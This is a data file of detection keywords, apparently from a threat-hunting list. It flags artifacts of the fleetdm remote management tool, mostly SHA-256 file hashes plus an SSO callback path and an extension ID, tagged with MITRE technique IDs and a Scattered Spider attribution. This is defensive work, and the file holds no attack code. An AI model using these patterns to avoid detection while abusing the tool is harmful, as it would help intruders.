"*9507e23a60968916342e626ca86fdde847cb30dafbe12a3f50f8854efef0f62e*",".{0,1000}9507e23a60968916342e626ca86fdde847cb30dafbe12a3f50f8854efef0f62e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*950ecb779365ffc85a6eba98a8d8dd5dfad765692385a2f59bc93ddbf13a489a*",".{0,1000}950ecb779365ffc85a6eba98a8d8dd5dfad765692385a2f59bc93ddbf13a489a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*971a9d100a6bed85f54fa61064075260f64396b2977e716cdd5537f5ab3c5e92*",".{0,1000}971a9d100a6bed85f54fa61064075260f64396b2977e716cdd5537f5ab3c5e92.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9887df54ec10a12b986c325675b360e2c43924618104c7914928520ede514fa0*",".{0,1000}9887df54ec10a12b986c325675b360e2c43924618104c7914928520ede514fa0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9b08ea44ec7fa2954c60c82ad8c4d54cdf84f3ea336639445b2b8b1d978551e0*",".{0,1000}9b08ea44ec7fa2954c60c82ad8c4d54cdf84f3ea336639445b2b8b1d978551e0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9c3262961652f77177675bb812a2e5037223505b780999dc4a57c656afe9e1e6*",".{0,1000}9c3262961652f77177675bb812a2e5037223505b780999dc4a57c656afe9e1e6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9d0c7f0c88518e5d682763f7697796846ba0c4156371bfc8df612f38b33b77e3*",".{0,1000}9d0c7f0c88518e5d682763f7697796846ba0c4156371bfc8df612f38b33b77e3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9dffd0600ac3634e75d99c867d2ca3791cd3a302513c42b4465c6300977d824c*",".{0,1000}9dffd0600ac3634e75d99c867d2ca3791cd3a302513c42b4465c6300977d824c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9e4a589aa9658c35abbcca54036c9cc0070d05f0708b8df2d8e9030bbb9f541a*",".{0,1000}9e4a589aa9658c35abbcca54036c9cc0070d05f0708b8df2d8e9030bbb9f541a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9f6fbc95920e22acace881c5702a9fda81104d98ff5f37ed2c343898d371c8b3*",".{0,1000}9f6fbc95920e22acace881c5702a9fda81104d98ff5f37ed2c343898d371c8b3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*9fc6416952495e1c0a13f2b1af1bf774e6dc5a90fcf0a50c942bba56709cb921*",".{0,1000}9fc6416952495e1c0a13f2b1af1bf774e6dc5a90fcf0a50c942bba56709cb921.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a0503d04e1f71f6856503024b70552eeeb6954e4aac61040a008f3917b38a684*",".{0,1000}a0503d04e1f71f6856503024b70552eeeb6954e4aac61040a008f3917b38a684.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a0b1523b50b26c6ceb479513d2278d448d9e826cebbaf2af7decd3e01b5d7a59*",".{0,1000}a0b1523b50b26c6ceb479513d2278d448d9e826cebbaf2af7decd3e01b5d7a59.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a0ffaba8096c1c103f4cadbf7e373d838f5ebca0b1f4a1b4fc600d623c7d4640*",".{0,1000}a0ffaba8096c1c103f4cadbf7e373d838f5ebca0b1f4a1b4fc600d623c7d4640.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a12f1b3315057920742569bb98f5031bfd200c52c6a808b327e5048a4f4991a4*",".{0,1000}a12f1b3315057920742569bb98f5031bfd200c52c6a808b327e5048a4f4991a4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a1d79ad7af2af9ffbcad20b0b5555f6a64d46eb19deada41d93e8becbd4866e3*",".{0,1000}a1d79ad7af2af9ffbcad20b0b5555f6a64d46eb19deada41d93e8becbd4866e3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a220124d70563eb4e79926b0b7ff4bfab36fc29d58b21152455ae1c63bbd5a28*",".{0,1000}a220124d70563eb4e79926b0b7ff4bfab36fc29d58b21152455ae1c63bbd5a28.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a25a28812d135f5a5dbc0a5a697cce19d94acd80913472d3dcc61178f9479e40*",".{0,1000}a25a28812d135f5a5dbc0a5a697cce19d94acd80913472d3dcc61178f9479e40.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a2af16bc6414fd3ce32d31efb76128bc14408027e654eada6569ee99df350a35*",".{0,1000}a2af16bc6414fd3ce32d31efb76128bc14408027e654eada6569ee99df350a35.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a3e6acda8965a5770977ec13a0431d2c544d12bc3f0c898a7c76cdf81ae33a69*",".{0,1000}a3e6acda8965a5770977ec13a0431d2c544d12bc3f0c898a7c76cdf81ae33a69.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a41b226ee731ac6c200b17e4367a5f57515f826896aed0a37f0595f9fe68b979*",".{0,1000}a41b226ee731ac6c200b17e4367a5f57515f826896aed0a37f0595f9fe68b979.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a4e6692b22ae9d6e230116f6f530c9775ab4d38743c460dc099f948e92cf075d*",".{0,1000}a4e6692b22ae9d6e230116f6f530c9775ab4d38743c460dc099f948e92cf075d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a5077f2fed33c896f464b7e3122debb2cbf0e3a4a69b848313113f8ec06d1aae*",".{0,1000}a5077f2fed33c896f464b7e3122debb2cbf0e3a4a69b848313113f8ec06d1aae.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a706b0c389ebfbd01cbdf08359c81497eda81c315a7963960ed8968a2173c866*",".{0,1000}a706b0c389ebfbd01cbdf08359c81497eda81c315a7963960ed8968a2173c866.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a7446e282755e5340b33572986e83bffa2a984d04d6f465d0a30da9538f9cea4*",".{0,1000}a7446e282755e5340b33572986e83bffa2a984d04d6f465d0a30da9538f9cea4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a8048a99c160781dd4b323d3751f9717663265416de4495fd9c7227bbee8a2f8*",".{0,1000}a8048a99c160781dd4b323d3751f9717663265416de4495fd9c7227bbee8a2f8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a81e90b8c56431c28537a4232b76cd55cf44217eabc106d359840f10be32d465*",".{0,1000}a81e90b8c56431c28537a4232b76cd55cf44217eabc106d359840f10be32d465.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a8a9b5fd7a0cc44f6874c90b4170009a46a88adc92367fcafb2acd32958afc98*",".{0,1000}a8a9b5fd7a0cc44f6874c90b4170009a46a88adc92367fcafb2acd32958afc98.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a908c8a15c730ce061360bcbb351135484b0f6e0a1fd19847888818bdab73d86*",".{0,1000}a908c8a15c730ce061360bcbb351135484b0f6e0a1fd19847888818bdab73d86.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a930c85fbceaf955c9ae865893b20a7164b0f8020b0a61ecee56d1a1490cc285*",".{0,1000}a930c85fbceaf955c9ae865893b20a7164b0f8020b0a61ecee56d1a1490cc285.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*a99cbde533415b845c99754a3f454d205d6e31b11fe03e7dca01a8ff32f42646*",".{0,1000}a99cbde533415b845c99754a3f454d205d6e31b11fe03e7dca01a8ff32f42646.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*aaba6ec560adf31f057113fc8c2e0f2387c9643206f9085e4179c109afcdd396*",".{0,1000}aaba6ec560adf31f057113fc8c2e0f2387c9643206f9085e4179c109afcdd396.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ac1f545786b7014c5a247d8854f114611814ed5f63232a9098f549732fa8814d*",".{0,1000}ac1f545786b7014c5a247d8854f114611814ed5f63232a9098f549732fa8814d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ac6ea42ae4f70b4b8bc0f1c0f6e453447d97c0f13eb5e2e1621765b304e43cdb*",".{0,1000}ac6ea42ae4f70b4b8bc0f1c0f6e453447d97c0f13eb5e2e1621765b304e43cdb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*af1fa340c0d3690024a828f2099482530d20351bafcd114860b7faf37ddf11cb*",".{0,1000}af1fa340c0d3690024a828f2099482530d20351bafcd114860b7faf37ddf11cb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*api/v1/fleet/sso/callback*",".{0,1000}api\/v1\/fleet\/sso\/callback.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b069bee7a2a19e296886fb26862e7432e0b2a0fbde72db072f369a0c0e990955*",".{0,1000}b069bee7a2a19e296886fb26862e7432e0b2a0fbde72db072f369a0c0e990955.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b11045e6accfd5cfa54afed6cfdfc2203873efe7541aa5a93f920d71d3a517b0*",".{0,1000}b11045e6accfd5cfa54afed6cfdfc2203873efe7541aa5a93f920d71d3a517b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b31716aa1e425286ea9372e2f72fa7e99e5df62dbe9ac54838d55a877a45abe1*",".{0,1000}b31716aa1e425286ea9372e2f72fa7e99e5df62dbe9ac54838d55a877a45abe1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b3f41948b9d55320be0884cdf9634a30089348e31bcb8a6675f75094167c741e*",".{0,1000}b3f41948b9d55320be0884cdf9634a30089348e31bcb8a6675f75094167c741e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b4aa7c480ce02aeb723529ed5e8c2874738ca4d2aeb9e718cdc96c5e5cbded3b*",".{0,1000}b4aa7c480ce02aeb723529ed5e8c2874738ca4d2aeb9e718cdc96c5e5cbded3b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b7678c523152e65ff7b537cafde3fd5ef076ea35e59c3c9148b44a7e6aee796d*",".{0,1000}b7678c523152e65ff7b537cafde3fd5ef076ea35e59c3c9148b44a7e6aee796d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b8e073c828b106964df38c2a16c30d9acae5aac15a2b4204f084bdf2579c3145*",".{0,1000}b8e073c828b106964df38c2a16c30d9acae5aac15a2b4204f084bdf2579c3145.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b9ccd13469c5223264dd92b763eff1f27dedd86aa9a2068a08fadce9527e7e71*",".{0,1000}b9ccd13469c5223264dd92b763eff1f27dedd86aa9a2068a08fadce9527e7e71.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*b9eb20c7cddd46e2b79c6dab5f85943439333c710bdf6d27fe930a44a6ccb042*",".{0,1000}b9eb20c7cddd46e2b79c6dab5f85943439333c710bdf6d27fe930a44a6ccb042.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*ba2b81d69ca915132c560a787698e84bf530236a234dd7163e391feb82858bb0*",".{0,1000}ba2b81d69ca915132c560a787698e84bf530236a234dd7163e391feb82858bb0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*bd7c78ae36f84966ffd5effbb9f9227d1a018d8cdb51a2e4e883d4d113453304*",".{0,1000}bd7c78ae36f84966ffd5effbb9f9227d1a018d8cdb51a2e4e883d4d113453304.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*bf2893ace82d8952c00dfaefc48cfb09e2d58fc2cf3553aadfdc250f4b03ccbd*",".{0,1000}bf2893ace82d8952c00dfaefc48cfb09e2d58fc2cf3553aadfdc250f4b03ccbd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*bfb8b8f3ed04f539f694f140dcf8fdbe07b4e96dfcf8fea3d555d1b69e14b384*",".{0,1000}bfb8b8f3ed04f539f694f140dcf8fdbe07b4e96dfcf8fea3d555d1b69e14b384.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*bfcf0d230e85b0d06d5fc6f19042169d856d2e6dd9a38214721a4cf97ae63af2*",".{0,1000}bfcf0d230e85b0d06d5fc6f19042169d856d2e6dd9a38214721a4cf97ae63af2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*bfleegjcoffelppfmadimianphbcdjkb*",".{0,1000}bfleegjcoffelppfmadimianphbcdjkb.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c08fd251db2d48d9eb48583b3b2209a8efda571ec6cdff6c7ebb22667ce3d360*",".{0,1000}c08fd251db2d48d9eb48583b3b2209a8efda571ec6cdff6c7ebb22667ce3d360.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c0ac4e96a2e27335de61a6ada3e55f96d66b9b01b7728456b93ba23a394183a8*",".{0,1000}c0ac4e96a2e27335de61a6ada3e55f96d66b9b01b7728456b93ba23a394183a8.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c0f76101eeb0225230ebae6e980fc1161eb5b3727c8d1fd9ccfe3ac1169ba5b7*",".{0,1000}c0f76101eeb0225230ebae6e980fc1161eb5b3727c8d1fd9ccfe3ac1169ba5b7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c18e861f5e44c1b731f14ddebcbbe4f6d4bd9ad24e71b49feb7d1ddde7cc1741*",".{0,1000}c18e861f5e44c1b731f14ddebcbbe4f6d4bd9ad24e71b49feb7d1ddde7cc1741.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c1ec990cba4b1e813de9ebc1bdf540bc5dada5d5521d3a339361d04c8d92c742*",".{0,1000}c1ec990cba4b1e813de9ebc1bdf540bc5dada5d5521d3a339361d04c8d92c742.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c22224a6e32bc2f071373a53c528513f993239f3a3bc52bfb0ed3d854fba86b5*",".{0,1000}c22224a6e32bc2f071373a53c528513f993239f3a3bc52bfb0ed3d854fba86b5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c29a459fab2edd0e81e797886daa70c210bb123e55331416cb6f5bd74bef0e6a*",".{0,1000}c29a459fab2edd0e81e797886daa70c210bb123e55331416cb6f5bd74bef0e6a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c38560c8536e3c4b0d7a072e373009b03aaf63e58114deef576808c82eb62596*",".{0,1000}c38560c8536e3c4b0d7a072e373009b03aaf63e58114deef576808c82eb62596.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c488cce70defe02c6a90ebdfe276d88f4fdaab9264e157588bdb0e6dba9c5a91*",".{0,1000}c488cce70defe02c6a90ebdfe276d88f4fdaab9264e157588bdb0e6dba9c5a91.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
"*c5185db5e8a84cb5fcad17d8501c2fd8aadb451d5c54fdda88af3504b4c850df*",".{0,1000}c5185db5e8a84cb5fcad17d8501c2fd8aadb451d5c54fdda88af3504b4c850df.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z"
